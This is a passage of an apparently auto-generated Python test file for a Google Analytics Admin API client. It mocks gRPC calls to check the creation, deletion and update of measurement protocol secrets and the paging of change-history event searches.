def test_create_measurement_protocol_secret_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_measurement_protocol_secret), "__call__"
    ) as call:
        client.create_measurement_protocol_secret()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.CreateMeasurementProtocolSecretRequest()


@pytest.mark.asyncio
async def test_create_measurement_protocol_secret_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.CreateMeasurementProtocolSecretRequest,
):
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_measurement_protocol_secret), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.MeasurementProtocolSecret(
                name="name_value",
                display_name="display_name_value",
                secret_value="secret_value_value",
            )
        )
        response = await client.create_measurement_protocol_secret(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.CreateMeasurementProtocolSecretRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.MeasurementProtocolSecret)
    assert response.name == "name_value"
    assert response.display_name == "display_name_value"
    assert response.secret_value == "secret_value_value"


@pytest.mark.asyncio
async def test_create_measurement_protocol_secret_async_from_dict():
    await test_create_measurement_protocol_secret_async(request_type=dict)


def test_create_measurement_protocol_secret_field_headers():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.CreateMeasurementProtocolSecretRequest()
    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_measurement_protocol_secret), "__call__"
    ) as call:
        call.return_value = resources.MeasurementProtocolSecret()
        client.create_measurement_protocol_secret(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_create_measurement_protocol_secret_field_headers_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.CreateMeasurementProtocolSecretRequest()
    request.parent = "parent/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_measurement_protocol_secret), "__call__"
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.MeasurementProtocolSecret()
        )
        await client.create_measurement_protocol_secret(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]


def test_create_measurement_protocol_secret_flattened():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_measurement_protocol_secret), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.MeasurementProtocolSecret()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.create_measurement_protocol_secret(
            parent="parent_value",
            measurement_protocol_secret=resources.MeasurementProtocolSecret(
                name="name_value"
            ),
        )

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].parent == "parent_value"
        assert args[
            0
        ].measurement_protocol_secret == resources.MeasurementProtocolSecret(
            name="name_value"
        )


def test_create_measurement_protocol_secret_flattened_error():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.create_measurement_protocol_secret(
            analytics_admin.CreateMeasurementProtocolSecretRequest(),
            parent="parent_value",
            measurement_protocol_secret=resources.MeasurementProtocolSecret(
                name="name_value"
            ),
        )


@pytest.mark.asyncio
async def test_create_measurement_protocol_secret_flattened_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.create_measurement_protocol_secret), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        # NOTE(review): the first assignment below is dead code — it is
        # immediately overwritten by the FakeUnaryUnaryCall wrapper
        # (generator artifact).
        call.return_value = resources.MeasurementProtocolSecret()

        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.MeasurementProtocolSecret()
        )
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.create_measurement_protocol_secret(
            parent="parent_value",
            measurement_protocol_secret=resources.MeasurementProtocolSecret(
                name="name_value"
            ),
        )

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].parent == "parent_value"
        assert args[
            0
        ].measurement_protocol_secret == resources.MeasurementProtocolSecret(
            name="name_value"
        )


@pytest.mark.asyncio
async def test_create_measurement_protocol_secret_flattened_error_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        await client.create_measurement_protocol_secret(
            analytics_admin.CreateMeasurementProtocolSecretRequest(),
            parent="parent_value",
            measurement_protocol_secret=resources.MeasurementProtocolSecret(
                name="name_value"
            ),
        )


def test_delete_measurement_protocol_secret(
    transport: str = "grpc",
    request_type=analytics_admin.DeleteMeasurementProtocolSecretRequest,
):
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_measurement_protocol_secret), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = None
        response = client.delete_measurement_protocol_secret(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.DeleteMeasurementProtocolSecretRequest()

    # Establish that the response is the type that we expect.
    assert response is None


def test_delete_measurement_protocol_secret_from_dict():
    test_delete_measurement_protocol_secret(request_type=dict)


def test_delete_measurement_protocol_secret_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_measurement_protocol_secret), "__call__"
    ) as call:
        client.delete_measurement_protocol_secret()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.DeleteMeasurementProtocolSecretRequest()


@pytest.mark.asyncio
async def test_delete_measurement_protocol_secret_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.DeleteMeasurementProtocolSecretRequest,
):
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_measurement_protocol_secret), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        response = await client.delete_measurement_protocol_secret(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.DeleteMeasurementProtocolSecretRequest()

    # Establish that the response is the type that we expect.
    assert response is None


@pytest.mark.asyncio
async def test_delete_measurement_protocol_secret_async_from_dict():
    await test_delete_measurement_protocol_secret_async(request_type=dict)


def test_delete_measurement_protocol_secret_field_headers():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.DeleteMeasurementProtocolSecretRequest()
    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_measurement_protocol_secret), "__call__"
    ) as call:
        call.return_value = None
        client.delete_measurement_protocol_secret(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_delete_measurement_protocol_secret_field_headers_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.DeleteMeasurementProtocolSecretRequest()
    request.name = "name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_measurement_protocol_secret), "__call__"
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        await client.delete_measurement_protocol_secret(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]


def test_delete_measurement_protocol_secret_flattened():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_measurement_protocol_secret), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = None
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.delete_measurement_protocol_secret(name="name_value",)

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].name == "name_value"


def test_delete_measurement_protocol_secret_flattened_error():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.delete_measurement_protocol_secret(
            analytics_admin.DeleteMeasurementProtocolSecretRequest(),
            name="name_value",
        )


@pytest.mark.asyncio
async def test_delete_measurement_protocol_secret_flattened_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.delete_measurement_protocol_secret), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        # NOTE(review): the first assignment is dead — immediately replaced by
        # the FakeUnaryUnaryCall wrapper (generator artifact).
        call.return_value = None
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.delete_measurement_protocol_secret(name="name_value",)

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].name == "name_value"


@pytest.mark.asyncio
async def test_delete_measurement_protocol_secret_flattened_error_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        await client.delete_measurement_protocol_secret(
            analytics_admin.DeleteMeasurementProtocolSecretRequest(),
            name="name_value",
        )


def test_update_measurement_protocol_secret(
    transport: str = "grpc",
    request_type=analytics_admin.UpdateMeasurementProtocolSecretRequest,
):
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.update_measurement_protocol_secret), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.MeasurementProtocolSecret(
            name="name_value",
            display_name="display_name_value",
            secret_value="secret_value_value",
        )
        response = client.update_measurement_protocol_secret(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.UpdateMeasurementProtocolSecretRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.MeasurementProtocolSecret)
    assert response.name == "name_value"
    assert response.display_name == "display_name_value"
    assert response.secret_value == "secret_value_value"


def test_update_measurement_protocol_secret_from_dict():
    test_update_measurement_protocol_secret(request_type=dict)


def test_update_measurement_protocol_secret_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.update_measurement_protocol_secret), "__call__"
    ) as call:
        client.update_measurement_protocol_secret()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.UpdateMeasurementProtocolSecretRequest()


@pytest.mark.asyncio
async def test_update_measurement_protocol_secret_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.UpdateMeasurementProtocolSecretRequest,
):
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.update_measurement_protocol_secret), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.MeasurementProtocolSecret(
                name="name_value",
                display_name="display_name_value",
                secret_value="secret_value_value",
            )
        )
        response = await client.update_measurement_protocol_secret(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.UpdateMeasurementProtocolSecretRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, resources.MeasurementProtocolSecret)
    assert response.name == "name_value"
    assert response.display_name == "display_name_value"
    assert response.secret_value == "secret_value_value"


@pytest.mark.asyncio
async def test_update_measurement_protocol_secret_async_from_dict():
    await test_update_measurement_protocol_secret_async(request_type=dict)


def test_update_measurement_protocol_secret_field_headers():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.UpdateMeasurementProtocolSecretRequest()
    request.measurement_protocol_secret.name = "measurement_protocol_secret.name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.update_measurement_protocol_secret), "__call__"
    ) as call:
        call.return_value = resources.MeasurementProtocolSecret()
        client.update_measurement_protocol_secret(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert (
        "x-goog-request-params",
        "measurement_protocol_secret.name=measurement_protocol_secret.name/value",
    ) in kw["metadata"]


@pytest.mark.asyncio
async def test_update_measurement_protocol_secret_field_headers_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.UpdateMeasurementProtocolSecretRequest()
    request.measurement_protocol_secret.name = "measurement_protocol_secret.name/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.update_measurement_protocol_secret), "__call__"
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.MeasurementProtocolSecret()
        )
        await client.update_measurement_protocol_secret(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert (
        "x-goog-request-params",
        "measurement_protocol_secret.name=measurement_protocol_secret.name/value",
    ) in kw["metadata"]


def test_update_measurement_protocol_secret_flattened():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.update_measurement_protocol_secret), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = resources.MeasurementProtocolSecret()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.update_measurement_protocol_secret(
            measurement_protocol_secret=resources.MeasurementProtocolSecret(
                name="name_value"
            ),
            update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
        )

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[
            0
        ].measurement_protocol_secret == resources.MeasurementProtocolSecret(
            name="name_value"
        )
        assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"])


def test_update_measurement_protocol_secret_flattened_error():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.update_measurement_protocol_secret(
            analytics_admin.UpdateMeasurementProtocolSecretRequest(),
            measurement_protocol_secret=resources.MeasurementProtocolSecret(
                name="name_value"
            ),
            update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
        )


@pytest.mark.asyncio
async def test_update_measurement_protocol_secret_flattened_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.update_measurement_protocol_secret), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        # NOTE(review): the first assignment is dead — immediately replaced by
        # the FakeUnaryUnaryCall wrapper (generator artifact).
        call.return_value = resources.MeasurementProtocolSecret()

        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            resources.MeasurementProtocolSecret()
        )
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.update_measurement_protocol_secret(
            measurement_protocol_secret=resources.MeasurementProtocolSecret(
                name="name_value"
            ),
            update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
        )

        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[
            0
        ].measurement_protocol_secret == resources.MeasurementProtocolSecret(
            name="name_value"
        )
        assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"])


@pytest.mark.asyncio
async def test_update_measurement_protocol_secret_flattened_error_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        await client.update_measurement_protocol_secret(
            analytics_admin.UpdateMeasurementProtocolSecretRequest(),
            measurement_protocol_secret=resources.MeasurementProtocolSecret(
                name="name_value"
            ),
            update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
        )


def test_search_change_history_events(
    transport: str = "grpc",
    request_type=analytics_admin.SearchChangeHistoryEventsRequest,
):
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.search_change_history_events), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = analytics_admin.SearchChangeHistoryEventsResponse(
            next_page_token="next_page_token_value",
        )
        response = client.search_change_history_events(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.SearchChangeHistoryEventsRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, pagers.SearchChangeHistoryEventsPager)
    assert response.next_page_token == "next_page_token_value"


def test_search_change_history_events_from_dict():
    test_search_change_history_events(request_type=dict)


def test_search_change_history_events_empty_call():
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.search_change_history_events), "__call__"
    ) as call:
        client.search_change_history_events()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.SearchChangeHistoryEventsRequest()


@pytest.mark.asyncio
async def test_search_change_history_events_async(
    transport: str = "grpc_asyncio",
    request_type=analytics_admin.SearchChangeHistoryEventsRequest,
):
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )

    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.search_change_history_events), "__call__"
    ) as call:
        # Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            analytics_admin.SearchChangeHistoryEventsResponse(
                next_page_token="next_page_token_value",
            )
        )
        response = await client.search_change_history_events(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == analytics_admin.SearchChangeHistoryEventsRequest()

    # Establish that the response is the type that we expect.
    assert isinstance(response, pagers.SearchChangeHistoryEventsAsyncPager)
    assert response.next_page_token == "next_page_token_value"


@pytest.mark.asyncio
async def test_search_change_history_events_async_from_dict():
    await test_search_change_history_events_async(request_type=dict)


def test_search_change_history_events_field_headers():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.SearchChangeHistoryEventsRequest()
    request.account = "account/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.search_change_history_events), "__call__"
    ) as call:
        call.return_value = analytics_admin.SearchChangeHistoryEventsResponse()
        client.search_change_history_events(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "account=account/value",) in kw["metadata"]


@pytest.mark.asyncio
async def test_search_change_history_events_field_headers_async():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )

    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = analytics_admin.SearchChangeHistoryEventsRequest()
    request.account = "account/value"

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.search_change_history_events), "__call__"
    ) as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            analytics_admin.SearchChangeHistoryEventsResponse()
        )
        await client.search_change_history_events(request)

        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request

    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert ("x-goog-request-params", "account=account/value",) in kw["metadata"]


def test_search_change_history_events_pager():
    # NOTE(review): AnonymousCredentials is passed uninstantiated here
    # (generator artifact) — confirm it is accepted by the constructor.
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials,
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.search_change_history_events), "__call__"
    ) as call:
        # Set the response to a series of pages.
        call.side_effect = (
            analytics_admin.SearchChangeHistoryEventsResponse(
                change_history_events=[
                    resources.ChangeHistoryEvent(),
                    resources.ChangeHistoryEvent(),
                    resources.ChangeHistoryEvent(),
                ],
                next_page_token="abc",
            ),
            analytics_admin.SearchChangeHistoryEventsResponse(
                change_history_events=[], next_page_token="def",
            ),
            analytics_admin.SearchChangeHistoryEventsResponse(
                change_history_events=[resources.ChangeHistoryEvent(),],
                next_page_token="ghi",
            ),
            analytics_admin.SearchChangeHistoryEventsResponse(
                change_history_events=[
                    resources.ChangeHistoryEvent(),
                    resources.ChangeHistoryEvent(),
                ],
            ),
            RuntimeError,
        )

        metadata = ()
        metadata = tuple(metadata) + (
            gapic_v1.routing_header.to_grpc_metadata((("account", ""),)),
        )
        pager = client.search_change_history_events(request={})

        assert pager._metadata == metadata

        results = [i for i in pager]
        # 3 + 0 + 1 + 2 events across the four mocked pages.
        assert len(results) == 6
        assert all(isinstance(i, resources.ChangeHistoryEvent) for i in results)


def test_search_change_history_events_pages():
    client = AnalyticsAdminServiceClient(
        credentials=ga_credentials.AnonymousCredentials,
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.search_change_history_events), "__call__"
    ) as call:
        # Set the response to a series of pages.
        call.side_effect = (
            analytics_admin.SearchChangeHistoryEventsResponse(
                change_history_events=[
                    resources.ChangeHistoryEvent(),
                    resources.ChangeHistoryEvent(),
                    resources.ChangeHistoryEvent(),
                ],
                next_page_token="abc",
            ),
            analytics_admin.SearchChangeHistoryEventsResponse(
                change_history_events=[], next_page_token="def",
            ),
            analytics_admin.SearchChangeHistoryEventsResponse(
                change_history_events=[resources.ChangeHistoryEvent(),],
                next_page_token="ghi",
            ),
            analytics_admin.SearchChangeHistoryEventsResponse(
                change_history_events=[
                    resources.ChangeHistoryEvent(),
                    resources.ChangeHistoryEvent(),
                ],
            ),
            RuntimeError,
        )
        pages = list(client.search_change_history_events(request={}).pages)
        for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
            assert page_.raw_page.next_page_token == token


@pytest.mark.asyncio
async def test_search_change_history_events_async_pager():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials,
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.search_change_history_events),
        "__call__",
        new_callable=mock.AsyncMock,
    ) as call:
        # Set the response to a series of pages.
        call.side_effect = (
            analytics_admin.SearchChangeHistoryEventsResponse(
                change_history_events=[
                    resources.ChangeHistoryEvent(),
                    resources.ChangeHistoryEvent(),
                    resources.ChangeHistoryEvent(),
                ],
                next_page_token="abc",
            ),
            analytics_admin.SearchChangeHistoryEventsResponse(
                change_history_events=[], next_page_token="def",
            ),
            analytics_admin.SearchChangeHistoryEventsResponse(
                change_history_events=[resources.ChangeHistoryEvent(),],
                next_page_token="ghi",
            ),
            analytics_admin.SearchChangeHistoryEventsResponse(
                change_history_events=[
                    resources.ChangeHistoryEvent(),
                    resources.ChangeHistoryEvent(),
                ],
            ),
            RuntimeError,
        )
        async_pager = await client.search_change_history_events(request={},)
        assert async_pager.next_page_token == "abc"
        responses = []
        async for response in async_pager:
            responses.append(response)

        assert len(responses) == 6
        assert all(isinstance(i, resources.ChangeHistoryEvent) for i in responses)


@pytest.mark.asyncio
async def test_search_change_history_events_async_pages():
    client = AnalyticsAdminServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials,
    )

    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
        type(client.transport.search_change_history_events),
        "__call__",
        new_callable=mock.AsyncMock,
    ) as call:
        # Set the response to a series of pages.
